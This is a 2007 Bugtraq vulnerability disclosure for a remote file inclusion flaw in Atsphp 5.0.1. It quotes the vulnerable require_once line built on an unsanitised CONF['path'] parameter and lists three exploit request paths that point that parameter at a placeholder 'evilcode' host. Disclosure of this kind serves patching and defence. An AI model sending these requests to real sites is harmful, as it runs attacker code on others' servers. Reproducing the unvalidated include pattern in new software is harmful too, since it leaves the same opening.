
Date: 30 Jan 2007 11:30:31 -0000
From: trzindan@...mail.fr
To: bugtraq@...urityfocus.com
Subject: Atsphp 5.0.1 [Top Sites] [index.php] - Remote File Include


########################################################################
#
# Atsphp 5.0.1 [Top Sites] [index.php] - Remote File Include 
# Download Source : http://scripts.ringsworld.com/top-sites/atsphp-5.0.1.zip
#
# Found By : Tr_ZiNDaN
# Location : TurkeY -- #trzindan (at) hotmail (dot) fr [email concealed]
########################################################################

file ;
index.php
sources/usercp.php
sources/admin.php

########################################################################

bugs ;

require_once("{$CONF['path']}/sources/misc/classes.php");


########################################################################
exp;
/atsphp-5.0.1/index.php?CONF[path]=evilcode?
/atsphp-5.0.1/sources/usercp.php?CONF[path]=evilcode?
/atsphp-5.0.1/sources/admin.php?CONF[path]=evilcode?

########################################################################

Thanks;
Crackers_Child,str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,,KurtEfendy

Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,Sehzade,XYU,Paradox_ MusLim Hackers

########################################################################

T3k T4b4nC4 2oo7~
